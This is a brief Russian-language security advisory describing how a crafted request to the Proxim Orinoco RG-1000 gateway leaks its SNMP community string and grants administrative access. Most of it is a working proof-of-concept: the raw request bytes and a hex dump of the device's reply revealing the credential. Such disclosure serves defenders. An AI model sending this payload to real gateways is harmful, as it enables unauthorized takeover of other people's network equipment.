Неавторизованный доступ в Proxim Orinoco Residential Gateway RG-1000

Обнаруженная уязвимость позволяет удаленному атакующему получить доступ к строке идентификации в OEM access points через SNMP. Посылая специально обработанный SNMP запрос к уязвимой системе, точка доступа возвратит системные опознавательные мандаты, включая строку идентификации. Эта строка может использоваться для получения административного доступа.

Пример запроса:

\x01\x00\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 

01 01 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
00 00 00 00 00 60 1d 20  2e 38 00 00 18 19 10 f8  | .....`. .8......
4f 52 69 4e 4f 43 4f 20  52 47 2d 31 31 30 30 20  | ORiNOCO RG-1100
30 33 39 32 61 30 00 00  00 00 00 00 00 00 00 00  | 0392a0..........
02 8f 24 02 52 47 2d 31  31 30 30 20 56 33 2e 38  | ..$.RG-1100 V3.8
33 20 53 4e 2d 30 32 55  54 30 38 32 33 32 33 34  | 3 SN-02UT0823234
32 20 56 00                                       | 2 V.
system.sysName.0 = "ORiNOCO RG-1100 0392a0"

Community name: 0392a0